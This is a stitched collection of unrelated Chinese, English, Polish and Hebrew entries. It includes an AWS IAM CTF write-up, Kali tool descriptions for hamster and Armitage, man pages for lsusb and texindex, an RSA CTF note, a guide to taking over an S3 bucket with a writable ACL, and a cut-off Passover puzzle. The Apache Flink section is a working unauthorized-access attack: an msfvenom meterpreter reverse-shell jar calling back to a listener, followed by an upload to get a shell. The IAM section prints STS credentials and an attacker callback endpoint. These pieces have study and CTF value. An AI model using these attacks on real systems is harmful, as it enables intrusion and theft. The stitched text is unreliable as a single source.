为:[https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2](https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2) 最后,使用 AWS CLI 的 SQS 服务里的 receive-message 接口,利用 --queue-url 参数指定这个队列的 URL 地址。 ```bash aws sqs receive-message --queue-url https://queue.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 ``` 此时可以在响应中看到一个 URL 地址。 <img width="1000" src="/img/1688698682.png"></br> 访问这个 URL 地址就可以看到 FLAG 了。 <img width="900" src="/img/1688698726.png"></br> 这个题目告诉我们,对于 SQS 服务,应该避免允许公开接收对列的消息,避免在传输消息时造成敏感信息的泄露。 ## 3. Enable Push Notifications 第 3 道题叫 Enable Push Notifications,给出的 Policy 如下: ```json { "Version": "2008-10-17", "Id": "Statement1", "Statement": [ { "Sid": "Statement1", "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "SNS:Subscribe", "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications", "Condition": { "StringLike": { "sns:Endpoint": "*@tbic.wiz.io" } } } ] } ``` 这个 Policy 允许 Endpoint 结尾是 @tbic.wiz.io 的人拥有这个 SNS 服务的 Subscribe 权限。 SNS(Simple Notification Service)可以帮助开发人员向移动设备、电子邮件、消息队列等多种终端发送通知消息,让你能够轻松地向用户传递重要信息和实时更新。简单来说,SNS 就像是一个消息广播系统,让你能够快速、可靠地将消息发送给订阅者,确保他们及时收到你发送的通知。 AWS CLI 中的 SNS Subscribe 功能里需要指定协议、通知端点以及 ARN,在 Policy 中我们已经知道 ARN 了,接下来就需要去构造一个通知端点,而且这个通知端点需要以 @tbic.wiz.io 结尾。 ```bash > aws sns subscribe help subscribe --topic-arn <value> --protocol <value> [--notification-endpoint <value>] ``` 查阅官方文档可以知道,通知协议支持 HTTP、HTTPS、EMAIL、SMS、SQS 等等,这里我们可以构造一个 HTTP 的通知端点,例如 [http://123.123.123.123:800/@tbic.wiz.io](http://123.123.123.123:800/@tbic.wiz.io),这样就符合这个 Policy 里的条件了,然后当我们执行订阅命令时,就会收到来自对方的消息。 那么先在自己的服务器上,使用 NC 监听一个端口。 ```bash nc -lvk 80 ``` 然后执行以下命令: ```bash aws sns subscribe --protocol http --notification-endpoint http://123.123.123.123:800/@tbic.wiz.io --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications ``` 此时,NC 就会收到一个请求,在请求中有一个 Token,待会儿会用到。 <img width="800" src="/img/1688698763.png"></br> 根据官方文档的描述,在进行 Subscribe 时,如果当前和订阅的主题不在一个 AWS 账号下,还需要进行确认操作,在进行确认操作的时候,就需要使用主题返回的 Token 值了。 我们使用以下命令进行确认操作。 ```bash aws sns confirm-subscription --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --token 336412f37fb687f5d51e6e2425c464de257ebd13d0594...... ``` 当我们执行完这条命令后,等待一会儿,在服务器上就可以接收到包含 FLAG 的消息了。 <img width="800" src="/img/1688698787.png"></br> 可以看到题目难度开始加大了,这里除了利用权限公开访问外,还涉及到了对 Policy 中限定条件的绕过。 因此我们在编写 Policy 的时候,除了注意权限不要设置过大外,还应该注意 Policy 中是否有可能被绕过的地方。 ## 4. Admin only? 第 4 题的名字叫 "Admin only?",给出的 Policy 如下: ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*" }, { "Effect": "Allow", "Principal": "*", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321", "Condition": { "StringLike": { "s3:prefix": "files/*" }, "ForAllValues:StringLike": { "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin" } } } ] } ``` 可以看到,这道题是和 S3 相关的,思路还是和第一题一样,先找到 FLAG 的 Key,然后拼接访问 FLAG 的地址即可。 那么,现在的目标就是获取到这个 FLAG 的 Key,但是我们从 Policy 里可以看到这个存储桶只对 arn:aws:iam::133713371337:user/admin 主体授予了 ListBucket 权限,所以现在要解决的问题就是,怎么绕过这个限制。 查阅官方文档,我们可以得到这样的一条信息:对于 ForAllValues,如果请求中没有键或者键值解析为空数据集(如空字符串),则也会返回 true,不要使用带有 Allow 效果的 ForAllValues,因为这样可能会过于宽容。 也就是说,如果我们把请求中的 aws:PrincipalArn 至为空,这里就会返回 True,那么就可以绕过了。 此时我们先发送一条包含 aws:PrincipalArn 的请求。 ```bash > aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/' An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied ``` 可以看到提示访问被拒绝,然后加上 `--no-sign-request` 试试。 ```bash > aws s3api list-objects --bucket thebigiamchallenge-admin-storage-abf1321 --prefix 'files/' --no-sign-request { "Contents": [ { "Key": "files/flag-as-admin.txt", "LastModified": "2023-06-07T19:15:43+00:00", "ETag": "\"e365cfa7365164c05d7a9c209c4d8514\"", "Size": 42, "StorageClass": "STANDARD" }, { "Key": "files/logo-admin.png", "LastModified": "2023-06-08T19:20:01+00:00", "ETag": "\"c57e95e6d6c138818bf38daac6216356\"", "Size": 81889, "StorageClass": "STANDARD" } ] } ``` 可以看到,此时就返回了存储桶里的对象了,然后我们访问 FLAG 即可。 <img width="900" src="/img/1688699129.png"></br> 在使用命令行操作的时候,因为默认会带上自己 AWS CLI 上所配置的身份信息,所以这里我们需要加上 `--no-sign-request`去绕过,但我们使用浏览器访问的时候,其实本身就不包含身份信息的,所以这里有个更简单的做法,就是直接使用浏览器访问,然后加上前缀就行了。 <img width="900" src="/img/1688699141.png"></br> 这题告诉我们,在策略中即使配置了授权主体,也不一定就是安全的,还要注意有没有使用 ForAllValues,那么我们应该如何防范呢,其实只要把 ForAllValues 替换成 ForAnyValue 就行了,如果键值是空值的话,ForAnyValue 会返回 False,而不是 True,此时我们如果是未授权的访问就会提示 AccessDenied 了。 <img width="1000" src="/img/1688699176.png"></br> ## 5. Do I know you? 第 5 题的名字叫 "Do I know you?",题目信息是:“我们将 AWS Cognito 配置为我们的主要身份提供商,希望我们没有犯任何错误。”,题目给的 Policy 是: ```json { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "mobileanalytics:PutEvents", "cognito-sync:*" ], "Resource": "*" }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::wiz-privatefiles", "arn:aws:s3:::wiz-privatefiles/*" ] } ] } ``` 根据题目信息,可以得知这道题和 AWS Cognito 有关,并且 Cognito 这块儿的配置应该是有问题的。 AWS Cognito 是一项托管服务,可帮助开发人员轻松添加用户身份验证和授权功能到应用程序中。它提供了用于注册、登录和管理用户的功能,支持常见的身份验证方法,如用户名/密码、社交媒体登录和身份提供商集成。Cognito 还提供了用户身份验证的安全性、可伸缩性和可定制性,并与其他 AWS 服务集成,使开发人员能够构建安全可靠的应用程序。 那么这里需要先了解下,如何使用 Cognito,根据官方文档的描述,要使用 Cognito 需要先创建一个 Amazon Cognito 身份池,然后填入创建的身份池 ID 去调用 SDK 获取临时凭证,最后通过临时凭证去操作资源。 这里我一开始使用自己创建的身份池做了下测试,发现提示没有权限,这也是理所当然的,那么下面我们就需要找到对方的身份池 ID 是什么,后来才知道,原来这个身份池 ID 就放在了这个 CTF 题目网页的源代码里。 <img width="1000" src="/img/1688699198.png"></br> 有了身份池 ID,就可以通过 SDK 调用相关服务了,这里可以直接用 ChatGPT 去生成相关代码,不过代码可能会有点小问题,需要手动调一下,下面是一个可用的代码。 ```html <!DOCTYPE html> <html> <head> <title>Cognito JavaScript SDK Example</title> <script src="https://sdk.amazonaws.com/js/aws-sdk-2.100.0.min.js"></script> </head> <body> <script> // 初始化AWS SDK配置 AWS.config.region = 'us-east-1'; AWS.config.credentials = new AWS.CognitoIdentityCredentials({ IdentityPoolId: 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b', }); // 获取临时凭证 AWS.config.credentials.get(function(err) { if (!err) { // 凭证获取成功 var accessKeyId = AWS.config.credentials.accessKeyId; var secretAccessKey = AWS.config.credentials.secretAccessKey; var sessionToken = AWS.config.credentials.sessionToken; // 进行后续操作,如访问S3 accessS3(accessKeyId, secretAccessKey, sessionToken); } else { // 凭证获取失败 console.error('Error retrieving credentials: ' + err); } }); // 使用临时凭证访问S3 function accessS3(accessKeyId, secretAccessKey, sessionToken) { var s3 = new AWS.S3({ accessKeyId: accessKeyId, secretAccessKey: secretAccessKey, sessionToken: sessionToken, }); var params = { Bucket: 'wiz-privatefiles', }; s3.getSignedUrl('listObjectsV2', params, function(err, data) { if (!err) { // S3存储桶列表获取成功 console.log(data); } else { // S3存储桶列表获取失败 console.error('Error listing S3 buckets: ' + err); } }); } </script> </body> </html> ``` 使用浏览器打开这个 HTML 文件,在 Console 中可以看到输出了一行地址。 <img width="800" src="/img/1688699225.png"></br> 访问它,就可以看到存储桶里的对象被列出了。 <img width="800" src="/img/1688699245.png"></br> 这里可以得知 FLAG 的 Key 是 flag1.txt,然后把代码修改下,改成读这个对象。 ```html <!DOCTYPE html> <html> <head> <title>Cognito JavaScript SDK Example</title> <script src="https://sdk.amazonaws.com/js/aws-sdk-2.100.0.min.js"></script> </head> <body> <script> // 初始化AWS SDK配置 AWS.config.region = 'us-east-1'; AWS.config.credentials = new AWS.CognitoIdentityCredentials({ IdentityPoolId: 'us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b', }); // 获取临时凭证 AWS.config.credentials.get(function(err) { if (!err) { // 凭证获取成功 var accessKeyId = AWS.config.credentials.accessKeyId; var secretAccessKey = AWS.config.credentials.secretAccessKey; var sessionToken = AWS.config.credentials.sessionToken; // 进行后续操作,如访问S3 accessS3(accessKeyId, secretAccessKey, sessionToken); } else { // 凭证获取失败 console.error('Error retrieving credentials: ' + err); } }); // 使用临时凭证访问S3 function accessS3(accessKeyId, secretAccessKey, sessionToken) { var s3 = new AWS.S3({ accessKeyId: accessKeyId, secretAccessKey: secretAccessKey, sessionToken: sessionToken, }); var params = { Bucket: 'wiz-privatefiles', Key: 'flag1.txt', }; s3.getSignedUrl('getObject', params, function(err, data) { if (!err) { // S3存储桶对象获取成功 console.log(data); } else { // S3存储桶对象获取失败 console.error('Error get S3 bucket object: ' + err); } }); } </script> </body> </html> ``` 用浏览器打开这段 HTML,复制打开 Console 中的链接,就可以得到 FLAG 了。 <img width="900" src="/img/1688699266.png"></br> 在这题里,可以得知,平时应该保护好自己的身份池 ID,另外身份池类型有不允许匿名访问和允许匿名访问这两种,在创建身份池的时候,我们应该选择使用不允许匿名访问的。 <img width="1000" src="/img/1688699289.png"></br> 如果设置了不允许匿名访问,那么我们在匿名访问的情况下去调用它的话,就会提示未授权访问,而不是直接生成临时令牌了。 <img width="900" src="/img/1688699306.png"></br> ## 6. One final push 第 6 题,也是最后一题,这题叫 One final push,题目内容是:“匿名访问已被禁止,现在看看你能做什么,现在尝试使用经过身份验证的角色: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role”,题目给出的 Policy 如下: ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Federated": "cognito-identity.amazonaws.com" }, "Action": "sts:AssumeRoleWithWebIdentity", "Condition": { "StringEquals": { "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" } } } ] } ``` 可以看到,这题其实是上一道题的延伸,身份池 ID 都是一样的。 在 Policy 的 Action 中有个利用 AssumeRoleWithWebIdentity 生成 STS 的行为。 通过查看官方文档可以知道,想利用 AssumeRoleWithWebIdentity 生成 STS 需要知道三个东西。 ```bash > aws sts assume-role-with-web-identity help --role-arn <value> --role-session-name <value> --web-identity-token <value> ``` 其中 role-arn 题目已经给我们了,role-session-name 我们自己随便起一个就行,那么最后剩下的就是 web-identity-token 了。 根据官方文档和询问 ChatGPT,web-identity-token 可以通过身份池 ID 去获得,而且生成 Token 的相关接口都是公开的,可以被直接调用,不需要授权。 要获取 Token,首先我们需要用这个身份池 ID 获取到它的身份 ID。 ```bash > aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b { "IdentityId": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db" } ``` 然后使用这个身份 ID 获取 Token,这个接口也是公共接口,不需要任何权限。 ```bash > aws cognito-identity get-open-id-token --identity-id us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db { "IdentityId": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db", "Token": "eyJraWQiOiJ1cy1lYXN0Lxxxx..." } ``` 最后利用上述信息,就可以调用 assume-role-with-web-identity 生成一个 STS 了。 ```bash > aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name teamssix --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoi... { "Credentials": { "AccessKeyId": "ASIARK7LBOHXDFQ6KRE3", "SecretAccessKey": "Wqk43MfgwPM5F7Z9IfFgv24RwHuCVDh8M0swTUyj", "SessionToken": "IQoJb3JpZ2luX2VjEND...", "Expiration": "2023-07-06T16:36:18+00:00" }, "SubjectFromWebIdentityToken": "us-east-1:453cea83-a2c0-4b64-a7ff-9dc3783701db", "AssumedRoleUser": { "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:teamssix", "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/teamssix" }, "Provider": "cognito-identity.amazonaws.com", "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" } ``` 最后使用环境变量配置这个 STS。 ```bash > export AWS_ACCESS_KEY_ID=ASIARK7LBOHXDFQ6KRE3 > export AWS_SECRET_ACCESS_KEY=Wqk43MfgwPM5F7Z9IfFgv24RwHuCVDh8M0swTUyj > export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEND... ``` 然后列下当前存储桶,其实这些存储桶就是上面所有题里用到的存储桶。 ```bash > aws s3 ls 2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f 2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321 2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b 2023-06-05 21:28:31 wiz-privatefiles 2023-06-05 21:28:31 wiz-privatefiles-x1000 ``` 最后,在 wiz-privatefiles-x1000 存储桶下找到 FLAG 文件。 ```bash aws s3api get-object --bucket wiz-privatefiles-x1000 --key flag2.txt flag2.txt ``` <img width="900" src="/img/1688699331.png"></br> 结束,拿到最后一个 FLAG。 到这里,其实可以得到一个结论,就是在拿到身份池 ID 以及所对应的角色 ARN 时,通过这两条信息,可以获取到对应角色的权限,因此平时应该注意,不要将这些信息泄露。 最后,通过上面这 6 道题,个人觉着还是能学习到不少东西的,在整个过程中需要查阅大量的官方文档,ChatGPT 也是个很好的辅助工具,另外这里也参考了一些其他人的 WP,我所参考的资料都放在参考链接了,在你去做这个 IAM 挑战赛的时候,以上内容或许可以帮助到你。 > 参考链接: > > 1. [https://docs.aws.amazon.com/zh_cn/AWSSimpleQueueService/latest/SQSDeveloperGuide/welcome.html](https://docs.aws.amazon.com/zh_cn/AWSSimpleQueueService/latest/SQSDeveloperGuide/welcome.html) > 2. [https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html](https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html) > 3. [https://docs.aws.amazon.com/zh_cn/sns/latest/dg/welcome.html](https://docs.aws.amazon.com/zh_cn/sns/latest/dg/welcome.html) > 4. [https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html](https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html) > 5. [https://docs.aws.amazon.com/cli/latest/reference/sns/confirm-subscription.html](https://docs.aws.amazon.com/cli/latest/reference/sns/confirm-subscription.html) > 6. [https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_multi-value-conditions.html#reference_policies_multi-key-or-value-conditions](https://docs.aws.amazon.com/zh_cn/IAM/latest/UserGuide/reference_policies_multi-value-conditions.html#reference_policies_multi-key-or-value-conditions) > 7. [https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/getting-started-with-identity-pools.html](https://docs.aws.amazon.com/zh_cn/cognito/latest/developerguide/getting-started-with-identity-pools.html) > 8. [https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html) > 9. [https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-open-id-token.html) > 10. [https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) > 11. [https://medium.com/@ayush.guha/ctf-thebigiamchallenge-walkthrough-534d727eb0d8](https://medium.com/@ayush.guha/ctf-thebigiamchallenge-walkthrough-534d727eb0d8) > 12. [https://zhuanlan.zhihu.com/p/640694595](https://zhuanlan.zhihu.com/p/640694595) <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2023 年 7 月 9 日" } } </script>
sec-knowleage
# hamster-sidejack包描述 Hamster是一种会话劫持工具。它可以伪装成代理服务器,通过将您的cookies替换成从其他人那窃取的会话cookies以使您劫持他们的会话。您可以使用Ferret程序嗅探Cookies同时您还还需要一份它的副本。 [hamster-sidejack Homepage](http://www.erratasec.com/)| [Kali hamster-sidejack Repo](http://git.kali.org/gitweb/?p=packages/hamster-sidejack.git;a=summary) - **作者**: Robert Graham - **许可证**:免费 ## hamster-sidejack包含的工具 ### hamster——一个会话劫持工具 ## hamster使用示例 ``` root @ kali:〜#hamster --- HAMPSTER 2.0 side-jacking tool --- 将浏览器使用的代理设置为http://127.0.0.1:1234 设置目标开启端口(1234) 设置本地监听端口(1234) 代理:监听127.0 .0.1:1234 开始线程 ``` [原文链接](http://tools.kali.org/sniffingspoofing/hamster-sidejack)
sec-knowleage
lsusb === 显示本机的USB设备列表信息 ## 补充说明 **lsusb命令** 用于显示本机的USB设备列表,以及USB设备的详细信息。 lsusb命令是一个学习USB驱动开发,认识USB设备的助手,推荐大家使用,如果您的开发板中或者产品中没有lsusb命令可以自己移植一个,放到文件系统里面。 ### 语法 ```shell lsusb(选项) ``` ### 选项 ```shell -v:显示USB设备的详细信息; -s<总线:设备号>仅显示指定的总线和(或)设备号的设备; -d<厂商:产品>:仅显示指定厂商和产品编号的设备; -t:以树状结构显示无理USB设备的层次; -V:显示命令的版本信息。 ``` ### 实例 插入usb鼠标后执行lsusb的输出内容如下: ```shell Bus 005 Device 001: id 0000:0000 Bus 001 Device 001: ID 0000:0000 Bus 004 Device 001: ID 0000:0000 Bus 003 Device 001: ID 0000:0000 Bus 002 Device 006: ID 15d9:0a37 Bus 002 Device 001: ID 0000:0000 ``` 解释: **Bus 005** 表示第五个usb主控制器(机器上总共有5个usb主控制器 -- 可以通过命令lspci | grep USB查看) **Device 006** 表示系统给usb鼠标分配的设备号(devnum),同时也可以看到该鼠标是插入到了第二个usb主控制器 ```shell 006 usb_device.devnum /sys/devices/pci0000:00/0000:00:1d.1/usb2/2-2/devnum ``` **ID 15d9:0a37** 表示usb设备的ID(这个ID由芯片制造商设置,可以唯一表示该设备) ```shell 15d9 usb_device_descriptor.idVendor 0a37 usb_device_descriptor.idProduct /sys/devices/pci0000:00/0000:00:1d.1/usb2/2-2/idVendor ``` **Bus 002 Device 006: ID 15d9:0a37 Bus 002 Device 001: ID 0000:0000** 表示002号usb主控制器上接入了两个设备: * 一个是usb根Hub -- 001  * 一个是usb鼠标  -- 006
sec-knowleage
# The best RSA (crypto 250) ###ENG [PL](#pl-version) This was a very badly designed task. We prepared an expected solver, but we didn't get the flag simply because we assumed this can't be a right solution. Apparently author thought it's a great idea to prepare a task which requires hours (!) of heavy multithreaded computations. We get [data](data.txt) with a very very long ciphertext and very very long modulus. However it's quite simple to notice that the modulus is divisible by 5, and quick check shows that it can be actually factored into primes <= 251. The only problem is that there are about 1500 of each prime, so de modulus is something like: `n = 3^14XX * 5^14XX * ... * 251^14XX` We can quickly factor this with small sieve. The naive approach would be to calculate `d` and `fi(n)` and decrypt the message, but this would take forever. Smarter approach would be to use RSA-CRT, so calculate `c^d mod p1`, `c^d mod p2`... where `p1 = 3^14XX`, `p2 = 5^14XX` etc, and then we use Chinese Reminder Theorem to calculate the final value. But this again takes a very very long time to calculate. We even tried to speed this up using Hensel lifting when calculating each of the values, but this didn't help that much. Therefore we simply decided we missed something here because it's just stupid to force us to run hours of computations. Apparently we didn't and this was the intended solution... ###PL version To było bardzo źle zaprojektowane zadanie. Napisaliśmy do niego solver, ale nie uzyskaliśmy flagi zwyczajnie dlatego, ze uznaliśmy że to nie może być poprawne rozwiązanie. Najwyraźniej autor uznał za świetny pomysł zadanie wymagające wielu godzin (!) równoległych obliczeń. Dostajemy [dane](data.txt) z bardzo bardzo długim ciphertextem oraz bardzo bardzo długim modulusem. Niemniej łatwo zauważyc, ze modulus jest podzielny przez 5, a szybkie sprawdzenie pozwala stwierdzić że w ogóle rozkłada sie na iloczyn liczb pierwszych <=251. Jedyny problem jest taki, że każdej z tych liczb jest około 1500 więc modulus to coś w stylu: `n = 3^14XX * 5^14XX * ... * 251^14XX` Możemy to szybko rozłożyć prostym sitem. Naiwne podejście to policzyć `d` oraz `fi(n)` a potem odszyfrować wiadomość, ale to trwałoby wieki. Lepsze podejście to użyć RSA-CRT, policzyć `c^d mod p1`, `c^d mod p2`... gdzie `p1 = 3^14XX`, `p2 = 5^14XX` itd a potem złożyć te rozwiązania za pomocą Chińskiego Twierdzenia o Resztach. Ale to mimo wszystko trwa bardzo długo. Próbowaliśmy przyspieszyć to za pomocą liftingu Hensela przy liczeniu kolejnych wartości, ale to specjalnie nie pomogło. W związku z tym uznaliśmy, że coś przeoczyliśmy, no przecież idiotycznym pomysłem byłoby wykonywać wielogodzinne obliczenia. Okazało się jednak, że wg autora to wcale nie takie głupie i takie właśnie było oczekiwane rozwiązanie...
sec-knowleage
--- title: Bucket ACL 可写 --- <center><h1>Bucket ACL 可写</h1></center> --- 列出目标 Bucket 提示被拒绝 </br> <img width="1000" src="/img/1650006428.png"></br> 查看目标 Bucket ACL 策略发现是可读的,且策略如下 ```bash aws s3api get-bucket-acl --bucket teamssix ``` </br> <img width="800" src="/img/1650006456.png"></br> 查询官方文档,内容如下: </br> <img width="1200" src="/img/1650006484.png"></br> </br> <img width="1200" src="/img/1650006510.png"></br> 通过官方文档,可以分析出这个策略表示任何人都可以访问、写入当前 Bucket 的 ACL 那么也就是说如果我们把权限修改为 FULL_CONTROL 后,就可以控制这个 Bucket 了,最后修改后的策略如下: ```json { "Owner": { "ID": "d24***5" }, "Grants": [ { "Grantee": { "Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers" }, "Permission": "FULL_CONTROL" } ] } ``` 将该策略写入 ```bash aws s3api put-bucket-acl --bucket teamssix --access-control-policy file://acl.json ``` </br> <img width="1000" src="/img/1650006554.png"></br> 再次尝试,发现就可以列出对象了 </br> <img width="1000" src="/img/1650006615.png"></br> > 参考资料: > > https://mp.weixin.qq.com/s/eZ8OAO5ELgUNvVricIStGA > > https://mp.weixin.qq.com/s/r0DuASP6gH_48b5sJ1DCTw > > https://docs.aws.amazon.com/zh_cn/AmazonS3/latest/userguide/acl-overview.html <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2022年4月15日" } } </script>
sec-knowleage
# Armitage 工具包介绍 Armitage是一款支持脚本的Metasploit红方协同工具,帮助将目标可视化,并进行漏洞推荐,显示框架中可用的的高级后渗透功能。 例如在一次Metasploit的使用中,你的团队将会: - 共用一个会话。 - 分享目标主机,获取数据,并下载文件。 - 通过一个共享的事件日志来交流。 - 运行程序自动化执行红方任务 。 Armitage是红方行动的效力放大器。 软件来源:http://www.fastandeasyhacking.com/manual#0 [Armitage主页](http://www.fastandeasyhacking.com/)|[Kali Armitage Repo仓库](https://gitlab.com/kalilinux/packages/armitage.git;a=summary) - 作者: Strategic Cyber LLC - 证书: BSD ## Armitage中包含的工具 ### armitage-红方协同工具包(Red team collaboration tool) Armitage是一款支持脚本的Metasploit红方协同工具,帮助将目标可视化,进行漏洞推荐,并显示框架中可用的的高级后渗透功能。 ### teamserver-Armitage团队服务器模块(Armitage Teamserver component) ``` root@kali:~# teamserver [*] You must provide: <external IP address> <team password> <external IP address> must be reachable by Armitage clients on port 55553 <team password> is a shared password your team uses to authenticate to the Armitage team server ``` ### armitage使用示例 ```bash root@kali:~# armitage [*] Starting msfrpcd for you. ``` ![](http://tools.kali.org/wp-content/uploads/2014/02/armitage.png) ### teamserver团队服务器使用示例 在一个外部IP ***(192.168.1.202)*** 上启动teamserver团队服务器,并设置服务器密码 ***(s3cr3t)*** : ``` root@kali:~# teamserver 192.168.1.202 s3cr3t [*] Generating X509 certificate and keystore (for SSL) [*] Starting RPC daemon [*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg... [*] MSGRPC backgrounding at 2014-05-14 15:05:46 -0400... [*] sleeping for 20s (to let msfrpcd initialize) [*] Starting Armitage team server [-] Java 1.6 is not supported with this tool. Please upgrade to Java 1.7 [*] Use the following connection details to connect your clients: Host: 192.168.1.202 Port: 55553 User: msf Pass: s3cr3t [*] Fingerprint (check for this string when you connect): a3b60bef430037a6b628d9011924341b8c09081 [+] multi-player metasploit... ready to go ```
sec-knowleage
# Apache Flink未授权访问漏洞 ## 漏洞描述 Apache Flink Dashboard默认没有用户权限认证,攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包,可远程执行任意系统命令获取服务器权限。 ## 环境搭建 测试版本:flink-1.15.1 修改`flink-1.15.1/confflink-conf.yaml`,将8081端口开启。 ![image-20220726112749940](../../.gitbook/assets/image-20220726112749940.png) 启动flink ``` start-cluster.sh ``` ## 漏洞利用 访问web页面。 ![image-20220726112140644](../../.gitbook/assets/image-20220726112140644.png) 利用msfovenom生成rce.jar ``` ┌──(root💀kali)-[/tmp] └─# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.32.130 LPORT=4444 -f jar > rce.jar Payload size: 5310 bytes Final size of jar file: 5310 bytes ``` 配置msf监听 ``` msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 1291.68.32.130 lhost => 1291.68.32.130 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > run ``` 在Submit New Job处上传`rec.jar`文件,点击submit。 ![image-20220726112442088](../../.gitbook/assets/image-20220726112442088.png) 成功getshell。 ![image-20230129203132779](../../.gitbook/assets/image-20230129203132779.png)
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.29. .TH TEXINDEX "1" "June 2003" "texindex 4.6" "User Commands" .SH NAME texindex \- 对 Texinfo 索引文件排序 .SH "SYNOPSIS 总览" .B texindex [\fIOPTION\fR]... \fIFILE\fR... .SH "DESCRIPTION 描述" 为每个 Tex 输出文件 FILE 产生一个已排序的索引。通常对于文档 `foo.texi',可以简单地指定 FILE... 为 `foo.??'。 .SH "OPTIONS 选项" .TP \fB\-h\fR, \fB\-\-help\fR 显示此帮助,然后退出 .TP \fB\-k\fR, \fB\-\-keep\fR 在处理之后,保留临时文件 .TP \fB\-\-no\-keep\fR 在处理之后,删除临时文件 (这是默认行为) .TP \fB\-o\fR, \fB\-\-output\fR FILE 将输出保存为 FILE .TP \fB\-\-version\fR 显示版本信息,然后退出 .SH "REPORTING BUGS 报告错误" 将错误报告发送到 bug-texinfo@gnu.org,一般的问题和讨论则发送到 help-texinfo@gnu.org。 Texinfo 主页: http://www.gnu.org/software/texinfo/ .SH COPYRIGHT Copyright \(co 2003 Free Software Foundation, Inc. There is NO warranty. You may redistribute this software under the terms of the GNU General Public License. For more information about these matters, see the files named COPYING. .SH "SEE ALSO 参见" .B texindex 的全部文档以 Texinfo 手册页形式保存。如果你的主机上正确安装了 .B info 和 .B texindex 程序,命令 .IP .B info texindex .PP 将使你可以读取完整的手册。
sec-knowleage
<div dir="rtl"> <h1>חידת אמ"ן - פסח התשפ"א</h1> <p> לרגל חג הפסח פרסם אגף המודיעין חידה קצרה. נראה כאן את הפתרון שלה. </p> <h2>חלק ראשון</h2> <h3>תיאור</h3> <p> ביקשנו ממיטב המוחות של אמ"ן לאתגר אותנו עם חידה מורכבת לכבוד הפסח. עברתם את כל השלבים? קיבלתם את המידע והצלחתם לפתור? כנראה שאתם כבר יודעים לאיזה מייל לשלוח לנו את התשובה... מערכת אתר צה"ל | 25.03.2021 </p> <pre dir="ltr" style="text-align: left"> If He had brought us out from Egypt, and had not carried out judgments against them !Dayenu, it would have sufficed us- If he had carried out judgments against them, and not against their idols !Dayenu, it would have sufficed us- If he had destroyed their idols, and had not smitten their first-born !Dayenu, it would have sufliced us- If he had smitten their first-born, and hed not given us their wealth !Dayenu, it would have sufficed us- If he had given us their wealth, and had not split the tea for us !Dayemu, it would have sufficed us- If he had split the sea for us, and had not taken us throuyh it on dry land !Dayenu, it would have sufficed us- If he hap taken us through the sea on dry lend, and had not drowned our opprossors in it !Dayenu, it would have sufficed us- If he had drowned our oppressors in it, and had not supplied our needs in the desert for forty years !Dayenu, it would have sufficed us- If he had supplied our needs in the desert for forty pears, and had not led us the manna !Dayenu, it would have sufficed us- If he had fed us the manna, and had not given us the Shebbat 